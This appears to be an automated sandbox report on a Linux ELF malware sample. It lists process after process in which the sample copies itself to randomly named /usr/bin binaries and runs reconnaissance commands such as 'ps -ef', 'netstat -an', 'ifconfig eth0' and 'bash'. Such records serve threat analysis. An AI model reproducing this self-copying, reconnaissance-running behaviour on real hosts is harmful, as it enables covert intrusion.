Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vijnytmbcx PID: 5700, Parent PID: 5699

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	/usr/bin/vijnytmbcx "ls -la" 5434
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: vijnytmbcx PID: 5704, Parent PID: 5700

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	-
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5702, Parent PID: 5434

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5703, Parent PID: 5702

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vijnytmbcx PID: 5703, Parent PID: 5702

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	/usr/bin/vijnytmbcx "ifconfig eth0" 5434
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: vijnytmbcx PID: 5705, Parent PID: 5703

General

Start time (UTC):	16:17:41
Start date (UTC):	09/04/2024
Path:	/usr/bin/vijnytmbcx
Arguments:	-
File size:	548627 bytes
MD5 hash:	58e08a371adcdc184b14882a86c3a02c

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5708, Parent PID: 5434

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5709, Parent PID: 5708

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: svkksitypo PID: 5709, Parent PID: 5708

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	/usr/bin/svkksitypo "cd /etc" 5434
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: svkksitypo PID: 5710, Parent PID: 5709

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	-
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5711, Parent PID: 5434

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5712, Parent PID: 5711

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: svkksitypo PID: 5712, Parent PID: 5711

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	/usr/bin/svkksitypo "cd /etc" 5434
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: svkksitypo PID: 5715, Parent PID: 5712

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	-
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5713, Parent PID: 5434

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5714, Parent PID: 5713

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: svkksitypo PID: 5714, Parent PID: 5713

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	/usr/bin/svkksitypo bash 5434
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: svkksitypo PID: 5718, Parent PID: 5714

General

Start time (UTC):	16:17:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	-
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5716, Parent PID: 5434

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5717, Parent PID: 5716

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: svkksitypo PID: 5717, Parent PID: 5716

General

Start time (UTC):	16:17:46
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	/usr/bin/svkksitypo bash 5434
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: svkksitypo PID: 5721, Parent PID: 5717

General

Start time (UTC):	16:17:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	-
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5719, Parent PID: 5434

General

Start time (UTC):	16:17:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5720, Parent PID: 5719

General

Start time (UTC):	16:17:47
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: svkksitypo PID: 5720, Parent PID: 5719

General

Start time (UTC):	16:17:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	/usr/bin/svkksitypo "ps -ef" 5434
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: svkksitypo PID: 5722, Parent PID: 5720

General

Start time (UTC):	16:17:47
Start date (UTC):	09/04/2024
Path:	/usr/bin/svkksitypo
Arguments:	-
File size:	548627 bytes
MD5 hash:	569e47223df9dabc4c719a2764a624b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5726, Parent PID: 5434

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5727, Parent PID: 5726

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wvicexcnqi PID: 5727, Parent PID: 5726

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	/usr/bin/wvicexcnqi who 5434
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: wvicexcnqi PID: 5728, Parent PID: 5727

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	-
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5729, Parent PID: 5434

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5730, Parent PID: 5729

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wvicexcnqi PID: 5730, Parent PID: 5729

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	/usr/bin/wvicexcnqi "route -n" 5434
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: wvicexcnqi PID: 5733, Parent PID: 5730

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	-
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5731, Parent PID: 5434

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5732, Parent PID: 5731

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wvicexcnqi PID: 5732, Parent PID: 5731

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	/usr/bin/wvicexcnqi "ls -la" 5434
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: wvicexcnqi PID: 5736, Parent PID: 5732

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	-
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5734, Parent PID: 5434

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5735, Parent PID: 5734

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wvicexcnqi PID: 5735, Parent PID: 5734

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	/usr/bin/wvicexcnqi bash 5434
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: wvicexcnqi PID: 5739, Parent PID: 5735

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	-
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5737, Parent PID: 5434

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5738, Parent PID: 5737

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wvicexcnqi PID: 5738, Parent PID: 5737

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	/usr/bin/wvicexcnqi "ifconfig eth0" 5434
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: wvicexcnqi PID: 5740, Parent PID: 5738

General

Start time (UTC):	16:17:52
Start date (UTC):	09/04/2024
Path:	/usr/bin/wvicexcnqi
Arguments:	-
File size:	548627 bytes
MD5 hash:	b7bb93075c07e1415a3ffbb806978f00

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5743, Parent PID: 5434

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5744, Parent PID: 5743

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: glxnohbcpa PID: 5744, Parent PID: 5743

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	/usr/bin/glxnohbcpa whoami 5434
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: glxnohbcpa PID: 5745, Parent PID: 5744

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	-
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5746, Parent PID: 5434

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5747, Parent PID: 5746

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: glxnohbcpa PID: 5747, Parent PID: 5746

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	/usr/bin/glxnohbcpa whoami 5434
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: glxnohbcpa PID: 5751, Parent PID: 5747

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	-
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5748, Parent PID: 5434

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5749, Parent PID: 5748

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: glxnohbcpa PID: 5749, Parent PID: 5748

General

Start time (UTC):	16:17:57
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	/usr/bin/glxnohbcpa who 5434
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: glxnohbcpa PID: 5755, Parent PID: 5749

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	-
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5750, Parent PID: 5434

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5752, Parent PID: 5750

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: glxnohbcpa PID: 5752, Parent PID: 5750

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	/usr/bin/glxnohbcpa "grep \"A\"" 5434
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: glxnohbcpa PID: 5756, Parent PID: 5752

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	-
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5753, Parent PID: 5434

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5754, Parent PID: 5753

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: glxnohbcpa PID: 5754, Parent PID: 5753

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	/usr/bin/glxnohbcpa "netstat -an" 5434
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: glxnohbcpa PID: 5757, Parent PID: 5754

General

Start time (UTC):	16:17:58
Start date (UTC):	09/04/2024
Path:	/usr/bin/glxnohbcpa
Arguments:	-
File size:	548627 bytes
MD5 hash:	75de2ec4c7a2f7ea217f0c93a872a2ce

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5760, Parent PID: 5434

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5761, Parent PID: 5760

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wircfeaxij PID: 5761, Parent PID: 5760

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	/usr/bin/wircfeaxij who 5434
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: wircfeaxij PID: 5762, Parent PID: 5761

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	-
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5763, Parent PID: 5434

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5764, Parent PID: 5763

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wircfeaxij PID: 5764, Parent PID: 5763

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	/usr/bin/wircfeaxij "grep \"A\"" 5434
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: wircfeaxij PID: 5767, Parent PID: 5764

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	-
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5765, Parent PID: 5434

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5766, Parent PID: 5765

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wircfeaxij PID: 5766, Parent PID: 5765

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	/usr/bin/wircfeaxij bash 5434
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: wircfeaxij PID: 5771, Parent PID: 5766

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	-
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5768, Parent PID: 5434

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5769, Parent PID: 5768

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wircfeaxij PID: 5769, Parent PID: 2935

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	/usr/bin/wircfeaxij "cd /etc" 5434
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: wircfeaxij PID: 5773, Parent PID: 5769

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	-
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5770, Parent PID: 5434

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5772, Parent PID: 5770

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: wircfeaxij PID: 5772, Parent PID: 2935

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	/usr/bin/wircfeaxij ls 5434
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: wircfeaxij PID: 5774, Parent PID: 5772

General

Start time (UTC):	16:18:03
Start date (UTC):	09/04/2024
Path:	/usr/bin/wircfeaxij
Arguments:	-
File size:	548627 bytes
MD5 hash:	4d0380946214d5b0447e4c2ff88e0486

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5777, Parent PID: 5434

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5778, Parent PID: 5777

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5778, Parent PID: 2935

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	/usr/bin/hvajrjqgqs bash 5434
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5783, Parent PID: 5778

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	-
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5779, Parent PID: 5434

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5780, Parent PID: 5779

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5780, Parent PID: 2935

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	/usr/bin/hvajrjqgqs "grep \"A\"" 5434
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5786, Parent PID: 5780

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	-
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5781, Parent PID: 5434

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5782, Parent PID: 5781

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5782, Parent PID: 2935

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	/usr/bin/hvajrjqgqs "cd /etc" 5434
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5789, Parent PID: 5782

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	-
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5784, Parent PID: 5434

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5785, Parent PID: 5784

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

